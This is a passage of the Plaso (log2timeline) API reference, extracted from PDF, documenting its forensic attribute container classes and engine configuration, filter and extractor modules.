class plaso.containers.artifacts.SourceConfigurationArtifact(path_spec=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer Source configuration artifact attribute container. The source configuration contains the configuration data of a source that is (or going to be) processed suchas volume in a storage media image or a mounted directory. mount_path path of a “mounted” directory input source. Type str path_spec path specification of the source that is processed. Type dfvfs.PathSpec system_configuration system configuration of a specific system installation, such as Windows or Linux, detected bythepre- processing on the source. Type SystemConfigurationArtifact CONTAINER_TYPE = 'source_configuration' class plaso.containers.artifacts.SystemConfigurationArtifact(code_page=None, time_zone=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer System configuration artifact attribute container. The system configuration contains the configuration data of a specific system installation such asWindowsor Linux. available_time_zones available time zones. Type list[TimeZone] code_page system code page. Type str hostname hostname. Type HostnameArtifact keyboard_layout keyboard layout. Type str operating_system operating system for example “MacOS” or “Windows”. Type str operating_system_product operating system product for example “Windows XP”. Type str operating_system_version operating system version for example “10.9.2” or “8.1”.

5.1. Subpackages 101 Plaso (log2timeline), Release 20210606

Type str time_zone system time zone. Type str user_accounts user accounts. Type list[UserAccountArtifact] windows_eventlog_providers Windows Event Log providers. Type list[WindowsEventLogProviderArtifact] CONTAINER_TYPE = 'system_configuration' class plaso.containers.artifacts.TimeZoneArtifact(localized_name=None, mui_form=None, name=None, offset=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer Time zone artifact attribute container. localized_name name describing the time zone in localized language for example “Greenwich (standaardtijd)”. Type str mui_form MUI form of the name describing the time zone for example “@tzres.dll,-112”. Type str name name describing the time zone for example “Greenwich Standard Time”. Type str offset time zone offset in number of minutes from UTC. Type int CONTAINER_TYPE = 'time_zone' class plaso.containers.artifacts.UserAccountArtifact(full_name=None, group_identifier=None, identifier=None, path_separator='/', user_directory=None, username=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer User account artifact attribute container. Also see: Cybox / Stix User Account Object full_name name describing the user. Type str group_identifier identifier of the primary group the user is part of. Type str

102 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

identifier user identifier. Type str user_directory path of the user (or home or profile) directory. Type str username name uniquely identifying the user. Type str CONTAINER_TYPE = 'user_account' GetUserDirectoryPathSegments() Retrieves the path segments of the user directory. Returns path segments of the user directory or an empty list if no user directory is set. Return type list[str] class plaso.containers.artifacts.WindowsEventLogProviderArtifact(category_message_files=None, event_message_files=None, log_source=None, log_type=None, parame- ter_message_files=None) Bases: plaso.containers.artifacts.ArtifactAttributeContainer Windows Event Log provider artifact attribute container. category_message_files filenames of the category message files. Type list[str] event_message_files filenames of the event message files. Type list[str] log_source Windows Event Log source. Type str log_type Windows Event Log type. Type str parameter_message_files filenames of the parameter message files. Type list[str] CONTAINER_TYPE = 'windows_eventlog_provider'

5.1. Subpackages 103 Plaso (log2timeline), Release 20210606

plaso.containers.event_sources module

Event source attribute containers. class plaso.containers.event_sources.EventSource(path_spec=None) Bases: plaso.containers.interface.AttributeContainer Event source attribute container. The event source object contains information about where a specific event originates e.g. a file, the $STAN- DARD_INFORMATION MFT attribute, or Application Compatibility cache. data_type attribute container type indicator. Type str file_entry_type dfVFS file entry type. Type str path_spec path specification. Type dfvfs.PathSpec CONTAINER_TYPE = 'event_source' DATA_TYPE = None __lt__(other) Compares if the event source attribute container is less than the other. Parameters other (EventSource) – event source attribute container to compare to. Returns True if the event source attribute container is less than the other. Return type bool class plaso.containers.event_sources.FileEntryEventSource(path_spec=None) Bases: plaso.containers.event_sources.EventSource File entry event source. The file entry event source is an event source that represents a file within a filesystem. DATA_TYPE = 'file_entry' plaso.containers.events module

Event attribute containers. class plaso.containers.events.EventData(data_type=None) Bases: plaso.containers.interface.AttributeContainer Event data attribute container. The event data attribute container represents the attributes of an entity, such as a database record or log line. data_type event data type indicator. Type str

104 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

parser string identifying the parser that produced the event data. Type str CONTAINER_TYPE = 'event_data' GetAttributeValuesString() Retrieves a comparable string of the attribute values. Returns comparable string of the attribute values. Return type str Raises TypeError – if the attribute value type is not supported. GetEventDataStreamIdentifier() Retrieves the identifier of the associated event data stream. The event data stream identifier is a storage specific value that requires special handling during serialization. Returns event data stream or None when not set. Return type AttributeContainerIdentifier SetEventDataStreamIdentifier(event_data_stream_identifier) Sets the identifier of the associated event data stream. The event data stream identifier is a storage specific value that requires special handling during serialization. Parameters event_data_stream_identifier (AttributeContainerIdentifier)– event data stream identifier. class plaso.containers.events.EventDataStream Bases: plaso.containers.interface.AttributeContainer Event data stream attribute container. The event data stream attribute container represents the attributes of a data stream, such as the content of a file or extended attribute. file_entropy byte entropy value of the data stream. Type str md5_hash MD5 digest hash of the data stream. Type str path_spec path specification of the data stream. Type dfvfs.PathSpec sha1_hash SHA-1 digest hash of the data stream. Type str sha256_hash SHA-256 digest hash of the data stream. Type str

5.1. Subpackages 105 Plaso (log2timeline), Release 20210606

yara_match names of the Yara rules that matched the data stream. Type list[str] CONTAINER_TYPE = 'event_data_stream' class plaso.containers.events.EventObject Bases: plaso.containers.interface.AttributeContainer Event attribute container. The framework is designed to parse files and create events from individual records, log lines or keys extracted from files. The event object provides an extensible data store for event attributes. date_time date and time values. Type dfdatetime.DateTimeValues timestamp timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int timestamp_desc description of the meaning of the timestamp. Type str CONTAINER_TYPE = 'event' GetEventDataIdentifier() Retrieves the identifier of the associated event data. The event data identifier is a storage specific value that requires special handling during serialization. Returns event data identifier or None when not set. Return type AttributeContainerIdentifier SetEventDataIdentifier(event_data_identifier) Sets the identifier of the associated event data. The event data identifier is a storage specific value that requires special handling during serialization. Parameters event_data_identifier (AttributeContainerIdentifier) – event data identifier. __lt__(other) Compares if the event attribute container is less than the other. Events are compared by timestamp. Parameters other (EventObject) – event attribute container to compare to. Returns True if the event attribute container is less than the other. Return type bool class plaso.containers.events.EventTag Bases: plaso.containers.interface.AttributeContainer Event tag attribute container. labels labels, such as “malware”, “application_execution”.

106 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type list[str] AddLabel(label) Adds a label to the event tag. Parameters label (str) – label. Raises • TypeError – if the label provided is not a string. • ValueError – if a label is malformed. AddLabels(labels) Adds labels to the event tag. Parameters labels (list[str]) – labels. Raises ValueError – if a label is malformed. CONTAINER_TYPE = 'event_tag' classmethod CopyTextToLabel(text, prefix='') Copies a string to a label. A label only supports a limited set of characters therefore unsupported characters are replaced with an underscore. Parameters • text (str) – label text. • prefix (Optional[str]) – label prefix. Returns label. Return type str CopyToDict() Copies the event tag to a dictionary. Returns event tag attributes. Return type dict[str, object] GetEventIdentifier() Retrieves the identifier of the associated event. The event identifier is a storage specific value that requires special handling during serialization. Returns event identifier or None when not set. Return type AttributeContainerIdentifier SetEventIdentifier(event_identifier) Sets the identifier of the associated event. The event identifier is a storage specific value that requires special handling during serialization. Parameters event_identifier (AttributeContainerIdentifier) – event identifier.

5.1. Subpackages 107 Plaso (log2timeline), Release 20210606 plaso.containers.interface module

The attribute container interface. class plaso.containers.interface.AttributeContainer Bases: object The attribute container interface. This is the the base class for those object that exists primarily as a container of attributes with basic accessors and mutators. The CONTAINER_TYPE class attribute contains a string that identifies the container type, for example the container type “event” identifiers an event object. Attributes are public class members of an serializable type. Protected and private class members are not to be serialized, with the exception of those defined in _SERIALIZABLE_PROTECTED_ATTRIBUTES. CONTAINER_TYPE = None CopyFromDict(attributes) Copies the attribute container from a dictionary. Parameters attributes (dict[str, object]) – attribute values per name. CopyToDict() Copies the attribute container to a dictionary. Returns attribute values per name. Return type dict[str, object] GetAttributeNames() Retrieves the names of all attributes. Returns attribute names. Return type list[str] GetAttributeValuesHash() Retrieves a comparable string of the attribute values. Returns hash of comparable string of the attribute values. Return type int GetAttributeValuesString() Retrieves a comparable string of the attribute values. Returns comparable string of the attribute values. Return type str GetAttributes() Retrieves the attribute names and values. Attributes that are set to None are ignored. Yields tuple[str, object] – attribute name and value. GetIdentifier() Retrieves the identifier. The identifier is a storage specific value that should not be serialized. Returns an unique identifier for the container.

108 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Return type AttributeContainerIdentifier GetSessionIdentifier() Retrieves the session identifier. The session identifier is a storage specific value that should not be serialized. Returns session identifier. Return type str SetIdentifier(identifier) Sets the identifier. The identifier is a storage specific value that should not be serialized. Parameters identifier (AttributeContainerIdentifier) – identifier. SetSessionIdentifier(session_identifier) Sets the session identifier. The session identifier is a storage specific value that should not be serialized. Parameters session_identifier (str) – session identifier. class plaso.containers.interface.AttributeContainerIdentifier Bases: object The attribute container identifier. The identifier is used to uniquely identify attribute containers. The value should be unique at runtimeandin storage. CopyToString() Copies the identifier to a string representation. Returns unique identifier or None. Return type str plaso.containers.manager module

This file contains the attribute container manager class. class plaso.containers.manager.AttributeContainersManager Bases: object Class that implements the attribute container manager. classmethod CreateAttributeContainer(container_type) Creates an instance of a specific attribute container type. Parameters container_type (str) – container type. Returns an instance of attribute container. Return type AttributeContainer Raises ValueError – if the container type is not supported. classmethod DeregisterAttributeContainer(attribute_container_class) Deregisters an attribute container class. The attribute container classes are identified based on their lower case container type. Parameters attribute_container_class (type) – attribute container class.

5.1. Subpackages 109 Plaso (log2timeline), Release 20210606

Raises KeyError – if attribute container class is not set for the corresponding container type. classmethod RegisterAttributeContainer(attribute_container_class) Registers a attribute container class. The attribute container classes are identified based on their lower case container type. Parameters attribute_container_class (type) – attribute container class. Raises KeyError – if attribute container class is already set for the corresponding container type. classmethod RegisterAttributeContainers(attribute_container_classes) Registers attribute container classes. The attribute container classes are identified based on their lower case container type. Parameters attribute_container_classes (list[type]) – attribute container classes. Raises KeyError – if attribute container class is already set for the corresponding container type. plaso.containers.plist_event module

Plist event attribute containers. class plaso.containers.plist_event.PlistTimeEventData Bases: plaso.containers.events.EventData Plist event data attribute container. desc description. Type str hostname hostname. Type str key name of plist key. Type str root path from the root to this plist key. Type str username unique username. Type str DATA_TYPE = 'plist:key'

110 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.containers.reports module

Report related attribute container definitions. class plaso.containers.reports.AnalysisReport(plugin_name=None, text=None) Bases: plaso.containers.interface.AttributeContainer Analysis report attribute container. analysis_counter counter of analysis results, for example number of events analyzed and tagged. Type collections.Counter event_filter event filter expression that was used when the analysis plugin was run. Type str filter_string deprecated variant of event_filter. Type str plugin_name name of the analysis plugin that generated the report. Type str report_dict ??? Type dict[str] text report text. Type str time_compiled timestamp of the date and time the report was compiled. Type int CONTAINER_TYPE = 'analysis_report' CopyToDict() Copies the attribute container to a dictionary. Returns attribute values per name. Return type dict[str, object] plaso.containers.sessions module

Session related attribute container definitions. class plaso.containers.sessions.Session Bases: plaso.containers.interface.AttributeContainer Session attribute container. aborted True if the session was aborted.

5.1. Subpackages 111 Plaso (log2timeline), Release 20210606

Type bool analysis_reports_counter number of analysis reports per analysis plugin. Type collections.Counter artifact_filters Names of artifact definitions that are used for filtering file system and Windows Registry key paths. Type list[str] command_line_arguments command line arguments. Type str completion_time time that the session was completed. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int debug_mode True if debug mode was enabled. Type bool enabled_parser_names parser and parser plugin names that were enabled. Type list[str] event_labels_counter number of event tags per label. Type collections.Counter filter_file path to a file with find specifications. Type str identifier unique identifier of the session. Type str parser_filter_expression parser filter expression. Type str parsers_counter number of events per parser or parser plugin. Type collections.Counter preferred_encoding preferred encoding. Type str preferred_time_zone preferred time zone. Type str

112 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

preferred_year preferred year. Type int product_name name of the product that created the session for example “log2timeline”. Type str product_version version of the product that created the session. Type str source_configurations configuration of sources that are (or going to be) processed. Type list[SourceConfiguration] start_time time that the session was started. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int text_prepend text to prepend to every display name. Type str CONTAINER_TYPE = 'session' CopyAttributesFromSessionCompletion(session_completion) Copies attributes from a session completion. Parameters session_completion (SessionCompletion) – session completion attribute container. Raises ValueError – if the identifier of the session completion does not match that oftheses- sion. CopyAttributesFromSessionConfiguration(session_configuration) Copies attributes from a session configuration. Parameters session_configuration (SessionConfiguration) – session configuration attribute container. Raises ValueError – if the identifier of the session configuration does not match that ofthe session. CopyAttributesFromSessionStart(session_start) Copies attributes from a session start. Parameters session_start (SessionStart) – session start attribute container. CreateSessionCompletion() Creates a session completion. Returns session completion attribute container. Return type SessionCompletion CreateSessionConfiguration() Creates a session configuration.

5.1. Subpackages 113 Plaso (log2timeline), Release 20210606

Returns session configuration attribute container. Return type SessionConfiguration CreateSessionStart() Creates a session start. Returns session start attribute container. Return type SessionStart UpdateAnalysisReportSessionCounter(analysis_report) Updates the analysis report session counter. Parameters analysis_report (AnalysisReport) – a report. UpdateEventLabelsSessionCounter(event_tag) Updates the event labels session counter. Parameters event_tag (EventTag) – an event tag. class plaso.containers.sessions.SessionCompletion(identifier=None) Bases: plaso.containers.interface.AttributeContainer Session completion attribute container. aborted True if the session was aborted. Type bool analysis_reports_counter number of analysis reports per analysis plugin. Type collections.Counter event_labels_counter number of event tags per label. Type collections.Counter identifier unique identifier of the session. Type str parsers_counter number of events per parser or parser plugin. Type collections.Counter timestamp time that the session was completed. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int CONTAINER_TYPE = 'session_completion' class plaso.containers.sessions.SessionConfiguration(identifier=None) Bases: plaso.containers.interface.AttributeContainer Session configuration attribute container. The session configuration contains various settings used within a session, such as parser and collection filters that are used, and information about the source being processed, such as the system configuration determined by pre-processing.

114 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

artifact_filters names of artifact definitions that are used for filtering file system and Windows Registry key paths. Type list[str] command_line_arguments command line arguments. Type str debug_mode True if debug mode was enabled. Type bool enabled_parser_names parser and parser plugin names that were enabled. Type list[str] filter_file path to a file with find specifications. Type str identifier unique identifier of the session. Type str parser_filter_expression parser filter expression. Type str preferred_encoding preferred encoding. Type str preferred_time_zone preferred time zone. Type str preferred_year preferred year. Type int source_configurations configuration of sources that are (or going to be) processed. Type list[SourceConfiguration] text_prepend text to prepend to every display name. Type str CONTAINER_TYPE = 'session_configuration' class plaso.containers.sessions.SessionStart(identifier=None) Bases: plaso.containers.interface.AttributeContainer Session start attribute container.

5.1. Subpackages 115 Plaso (log2timeline), Release 20210606

identifier unique identifier of the session. Type str product_name name of the product that created the session for example “log2timeline”. Type str product_version version of the product that created the session. Type str timestamp time that the session was started. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int CONTAINER_TYPE = 'session_start' plaso.containers.shell_item_events module

Shell item event attribute container. class plaso.containers.shell_item_events.ShellItemFileEntryEventData Bases: plaso.containers.events.EventData Shell item file entry event data attribute container. name name of the file entry shell item. Type str long_name long name of the file entry shell item. Type str localized_name localized name of the file entry shell item. Type str file_reference NTFS file reference, in the format: “MTF entry - sequence number”. Type str shell_item_path shell item path. Type str origin origin of the event. Type str DATA_TYPE = 'windows:shell_item:file_entry'

116 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.containers.storage_media module

Storage media related attribute container definitions. class plaso.containers.storage_media.MountPoint(mount_path=None, path_specification=None) Bases: plaso.containers.interface.AttributeContainer Mount point attribute container. mount_path path where the path specification is mounted, such as “/mnt/image” or “C:". Type str path_spec path specification. Type dfvfs.PathSpec CONTAINER_TYPE = 'mount_point' plaso.containers.tasks module

Task related attribute container definitions. class plaso.containers.tasks.Task(session_identifier=None) Bases: plaso.containers.interface.AttributeContainer Task attribute container. A task describes a piece of work for a multi processing worker process for example a task to process a path specification or to analyze an event. aborted True if the session was aborted. Type bool completion_time time that the task was completed. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int file_entry_type dfVFS type of the file entry the path specification is referencing. Type str has_retry True if the task was previously abandoned and a retry task was created, False otherwise. Type bool identifier unique identifier of the task. Type str last_processing_time the last time the task was marked as being processed as number of milliseconds since January 1, 1970, 00:00:00 UTC. Type int

5.1. Subpackages 117 Plaso (log2timeline), Release 20210606

merge_priority priority used for the task storage file merge, where a lower value indicates a higher priority to merge. Type int path_spec path specification. Type dfvfs.PathSpec session_identifier the identifier of the session the task is part of. Type str start_time time that the task was started. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int storage_file_size size of the storage file in bytes. Type int storage_format the format the task results are to be stored in. Type str CONTAINER_TYPE = 'task' CreateRetryTask() Creates a new task to retry a previously abandoned task. The retry task will have a new identifier but most of the attributes will be a copy of the previously abandoned task. Returns a task to retry a previously abandoned task. Return type Task CreateTaskCompletion() Creates a task completion. Returns task completion attribute container. Return type TaskCompletion CreateTaskStart() Creates a task start. Returns task start attribute container. Return type TaskStart UpdateProcessingTime() Updates the processing time to now. __lt__(other) Compares if the task attribute container is less than the other. Parameters other (Task) – task attribute container to compare to. Returns True if the task attribute container is less than the other. Return type bool

118 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

class plaso.containers.tasks.TaskCompletion(identifier=None, session_identifier=None) Bases: plaso.containers.interface.AttributeContainer Task completion attribute container. aborted True if the session was aborted. Type bool identifier unique identifier of the task. Type str session_identifier the identifier of the session the task is part of. Type str timestamp time that the task was completed. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int CONTAINER_TYPE = 'task_completion' class plaso.containers.tasks.TaskStart(identifier=None, session_identifier=None) Bases: plaso.containers.interface.AttributeContainer Task start attribute container. identifier unique identifier of the task. Type str session_identifier the identifier of the session the task is part of. Type str timestamp time that the task was started. Contains the number of micro seconds since January 1, 1970, 00:00:00 UTC. Type int CONTAINER_TYPE = 'task_start' plaso.containers.time_events module

Time-based event attribute containers. class plaso.containers.time_events.DateTimeValuesEvent(date_time, date_time_description, time_zone=None) Bases: plaso.containers.events.EventObject dfDateTime date time values-based event attribute container. date_time date and time values. Type dfdatetime.DateTimeValues

5.1. Subpackages 119 Plaso (log2timeline), Release 20210606

timestamp timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC. Type int timestamp_desc description of the meaning of the timestamp. Type str

plaso.containers.warnings module

Warning attribute containers. class plaso.containers.warnings.AnalysisWarning(message=None, plugin_name=None) Bases: plaso.containers.interface.AttributeContainer Analysis warning attribute container. Analysis warnings are produced by analysis plugins when they encounter situations that should be brought to the users’ attention but are not analysis results. message warning message. Type str plugin_name name of the analysis plugin to which the warning applies. Type str CONTAINER_TYPE = 'analysis_warning' class plaso.containers.warnings.ExtractionWarning(message=None, parser_chain=None, path_spec=None) Bases: plaso.containers.interface.AttributeContainer Extraction warning attribute container. Extraction warnings are produced by parsers/plugins when they encounter situations that should be brought to the users’ attention but are not events derived from the data being processed. message warning message. Type str parser_chain parser chain to which the warning applies. Type str path_spec path specification of the file entry to which the warning applies. Type dfvfs.PathSpec CONTAINER_TYPE = 'extraction_warning' class plaso.containers.warnings.PreprocessingWarning(message=None, path_spec=None, plugin_name=None) Bases: plaso.containers.interface.AttributeContainer Preprocessing warning attribute container.

120 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Preprocessing warnings are produced by preprocessing plugins when they encounter situations that should be brought to the users’ attention but are not preprocessing results. message warning message. Type str path_spec path specification of the file entry to which the warning applies. Type dfvfs.PathSpec plugin_name name of the preprocessing plugin to which the warning applies. Type str CONTAINER_TYPE = 'preprocessing_warning' class plaso.containers.warnings.RecoveryWarning(message=None, parser_chain=None, path_spec=None) Bases: plaso.containers.interface.AttributeContainer Recovery warning attribute container. Recovery warnings are warning encountered during recovery. They are typically produced by parsers/plugins when they are unable to recover events. message warning message. Type str parser_chain parser chain to which the warning applies. Type str path_spec path specification of the file entry to which the warning applies. Type dfvfs.PathSpec CONTAINER_TYPE = 'recovery_warning' plaso.containers.windows_events module

Windows event data attribute containers. class plaso.containers.windows_events.WindowsDistributedLinkTrackingEventData(uuid, origin) Bases: plaso.containers.events.EventData Windows distributed link event data attribute container. mac_address MAC address stored in the UUID. Type str origin origin of the event (event source). E.g. the path of the corresponding LNK file or file reference MFT entry with the corresponding NTFS $OBJECT_ID attribute. Type str

5.1. Subpackages 121 Plaso (log2timeline), Release 20210606

uuid UUID. Type str DATA_TYPE = 'windows:distributed_link_tracking:creation' class plaso.containers.windows_events.WindowsRegistryEventData Bases: plaso.containers.events.EventData Windows Registry event data attribute container. key_path Windows Registry key path. Type str values names and data of the values in the key. Type str DATA_TYPE = 'windows:registry:key_value' class plaso.containers.windows_events.WindowsVolumeEventData Bases: plaso.containers.events.EventData Windows volume event data attribute container. device_path volume device path. Type str origin origin of the event (event source), for example the corresponding Prefetch file name. Type str serial_number volume serial number. Type str DATA_TYPE = 'windows:volume:creation'

Module contents

This file imports Python modules that register attribute container types.

5.1.5 plaso.engine package

Submodules plaso.engine.artifact_filters module

Helper to create filters based on forensic artifact definitions. class plaso.engine.artifact_filters.ArtifactDefinitionsFiltersHelper(artifacts_registry, knowledge_base) Bases: plaso.engine.filters_helper.CollectionFiltersHelper

122 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Helper to create collection filters based on artifact definitions. Builds collection filters from forensic artifact definitions. For more information about Forensic Artifacts see: https://github.com/ForensicArtifacts/artifacts/blob/main/ docs/Artifacts%20definition%20format%20and%20style%20guide.asciidoc file_system_artifact_names names of artifacts definitions that generated file system find specifications. Type set[str] registry_artifact_names names of artifacts definitions that generated Windows Registry find specifications. Type set[str] BuildFindSpecs(artifact_filter_names, environment_variables=None) Builds find specifications from artifact definitions. Parameters • artifact_filter_names (list[str]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths. • environment_variables (Optional[list[EnvironmentVariableArtifact]])– environment variables. classmethod CheckKeyCompatibility(key_path) Checks if a Windows Registry key path is supported by dfWinReg. Parameters key_path (str) – path of the Windows Registry key. Returns True if key is compatible or False if not. Return type bool plaso.engine.configurations module

Processing configuration classes. class plaso.engine.configurations.CredentialConfiguration(credential_data=None, credential_type=None, path_spec=None) Bases: plaso.containers.interface.AttributeContainer Configuration settings for a credential. credential_data credential data. Type bytes credential_type credential type. Type str path_spec path specification. Type dfvfs.PathSpec CONTAINER_TYPE = 'credential_configuration'

5.1. Subpackages 123 Plaso (log2timeline), Release 20210606 class plaso.engine.configurations.EventExtractionConfiguration Bases: plaso.containers.interface.AttributeContainer Configuration settings for event extraction. These settings are primarily used by the parser mediator. filter_object filter that specifies which events to include. Type objectfilter.Filter CONTAINER_TYPE = 'event_extraction_configuration' class plaso.engine.configurations.ExtractionConfiguration Bases: plaso.containers.interface.AttributeContainer Configuration settings for extraction. These settings are primarily used by the extraction worker. hasher_file_size_limit maximum file size that hashers should process, where 0 or None represents unlimited. Type int hasher_names_string comma separated string of names of hashers to use during processing. Type str process_archives True if archive files should be scanned for file entries. Type bool process_compressed_streams True if file content in compressed streams should be processed. Type bool yara_rules_string Yara rule definitions. Type str CONTAINER_TYPE = 'extraction_configuration' class plaso.engine.configurations.ProcessingConfiguration Bases: plaso.containers.interface.AttributeContainer Configuration settings for processing. artifact_filters names of artifact definitions that are used for filtering file system and Windows Registry key paths. Type Optional list[str] credentials credential configurations. Type list[CredentialConfiguration] data_location path to the data files. Type str

124 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

debug_output True if debug output should be enabled. Type bool event_extraction event extraction configuration. Type EventExtractionConfiguration extraction extraction configuration. Type ExtractionConfiguration filter_file path to a file with find specifications. Type str log_filename name of the log file. Type str parser_filter_expression parser filter expression, where None represents all parsers and plugins. Type str preferred_year preferred initial year value for year-less date and time values. Type int profiling profiling configuration. Type ProfilingConfiguration task_storage_format format to use for storing task results. Type str task_storage_path path of the directory containing SQLite task storage files. Type str temporary_directory path of the directory for temporary files. Type str CONTAINER_TYPE = 'processing_configuration' class plaso.engine.configurations.ProfilingConfiguration Bases: plaso.containers.interface.AttributeContainer Configuration settings for profiling. directory path to the directory where the profiling sample files should be stored. Type str

5.1. Subpackages 125 Plaso (log2timeline), Release 20210606

profilers names of the profilers to enable. Supported profilers are: • ‘memory’, which profiles memory usage; • ‘parsers’, which profiles CPU time consumed by individual parsers; • ‘processing’, which profiles CPU time consumed by different parts of processing; • ‘serializers’, which profiles CPU time consumed by individual serializers. • ‘storage’, which profiles storage reads and writes.

Type set(str)

sample_rate the profiling sample rate. Contains the number of event sources processed. Type int CONTAINER_TYPE = 'profiling_configuration' HaveProfileAnalyzers() Determines if analyzers profiling is configured. Returns True if analyzers profiling is configured. Return type bool HaveProfileMemory() Determines if memory profiling is configured. Returns True if memory profiling is configured. Return type bool HaveProfileParsers() Determines if parsers profiling is configured. Returns True if parsers profiling is configured. Return type bool HaveProfileProcessing() Determines if processing profiling is configured. Returns True if processing profiling is configured. Return type bool HaveProfileSerializers() Determines if serializers profiling is configured. Returns True if serializers profiling is configured. Return type bool HaveProfileStorage() Determines if storage profiling is configured. Returns True if storage profiling is configured. Return type bool HaveProfileTaskQueue() Determines if task queue profiling is configured.

126 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Returns True if task queue profiling is configured. Return type bool HaveProfileTasks() Determines if tasks profiling is configured. Returns True if task queue profiling is configured. Return type bool plaso.engine.engine module

The processing engine. class plaso.engine.engine.BaseEngine Bases: object Processing engine interface. collection_filters_helper collection filters helper. Type CollectionFiltersHelper knowledge_base knowledge base. Type KnowledgeBase classmethod BuildArtifactsRegistry(artifact_definitions_path, custom_artifacts_path) Build Find Specs from artifacts or filter file if available. Parameters • artifact_definitions_path (str) – path to artifact definitions file. • custom_artifacts_path (str) – path to custom artifact definitions file. Returns artifact definitions registry. Return type artifacts.ArtifactDefinitionsRegistry Raises BadConfigOption – if artifact definitions cannot be read. BuildCollectionFilters(artifact_definitions_path, custom_artifacts_path, knowledge_base_object, artifact_filter_names=None, filter_file_path=None) Builds collection filters from artifacts or filter file if available. Parameters • artifact_definitions_path (str) – path to artifact definitions file. • custom_artifacts_path (str) – path to custom artifact definitions file. • knowledge_base_object (KnowledgeBase) – knowledge base. • artifact_filter_names (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths. • filter_file_path (Optional[str]) – path of filter file. Raises InvalidFilter – if no valid file system find specifications are built.

5.1. Subpackages 127 Plaso (log2timeline), Release 20210606

classmethod CreateSession(artifact_filter_names=None, command_line_arguments=None, debug_mode=False, filter_file_path=None, preferred_encoding='utf-8', preferred_time_zone=None, preferred_year=None, text_prepend=None) Creates a session attribute container. Parameters • artifact_filter_names (Optional[list[str]]) – names of artifact definitions that are used for filtering file system and Windows Registry key paths. • command_line_arguments (Optional[str]) – the command line arguments. • debug_mode (bool) – True if debug mode was enabled. • filter_file_path (Optional[str]) – path to a file with find specifications. • preferred_encoding (Optional[str]) – preferred encoding. • preferred_time_zone (Optional[str]) – preferred time zone. • preferred_year (Optional[int]) – preferred year. • text_prepend (Optional[str]) – text to prepend to every display name. Returns session attribute container. Return type Session GetSourceFileSystem(source_path_spec, resolver_context=None) Retrieves the file system of the source. Parameters • source_path_spec (dfvfs.PathSpec) – path specifications of the sources to process. • resolver_context (dfvfs.Context) – resolver context. Returns containing: dfvfs.FileSystem: file system path.PathSpec: mount point path specification. Themount point path specification refers to either a directory or a volume on a storage mediadevice or image. It is needed by the dfVFS file system searcher (FileSystemSearcher) to indicate the base location of the file system. Return type tuple Raises RuntimeError – if source file system path specification is not set. PreprocessSources(artifacts_registry_object, source_path_specs, session, storage_writer, resolver_context=None) Preprocesses the sources. Parameters • artifacts_registry_object (artifacts.ArtifactDefinitionsRegistry) – artifact definitions registry. • source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process. • session (Session) – session the preprocessing is part of. • storage_writer (StorageWriter) – storage writer.

128 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• resolver_context (Optional[dfvfs.Context]) – resolver context. plaso.engine.extractors module

The extractor class definitions. An extractor is a class used to extract information from “raw” data. class plaso.engine.extractors.EventExtractor(force_parser=False, parser_filter_expression=None) Bases: object Event extractor. An event extractor extracts events from event sources. ParseDataStream(parser_mediator, file_entry, data_stream_name) Parses a data stream of a file entry with the enabled parsers. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_entry (dfvfs.FileEntry) – file entry. • data_stream_name (str) – data stream name. Raises RuntimeError – if the file-like object or the parser object is missing. ParseFileEntryMetadata(parser_mediator, file_entry) Parses the file entry metadata such as file system data. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_entry (dfvfs.FileEntry) – file entry. ParseMetadataFile(parser_mediator, file_entry, data_stream_name) Parses a metadata file. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_entry (dfvfs.FileEntry) – file entry. • data_stream_name (str) – data stream name. class plaso.engine.extractors.PathSpecExtractor Bases: object Path specification extractor. A path specification extractor extracts path specification from a source directory, file or storage media deviceor image. ExtractPathSpecs(path_specs, find_specs=None, recurse_file_system=True, resolver_context=None) Extracts path specification from a specific source. Parameters • path_specs (Optional[list[dfvfs.PathSpec]]) – path specifications. • find_specs (Optional[list[dfvfs.FindSpec]]) – find specifications used in path specification extraction.

5.1. Subpackages 129 Plaso (log2timeline), Release 20210606

• recurse_file_system (Optional[bool]) – True if extraction should recurse into a file system. • resolver_context (Optional[dfvfs.Context]) – resolver context. Yields dfvfs.PathSpec – path specification of a file entry found in the source. plaso.engine.filter_file module

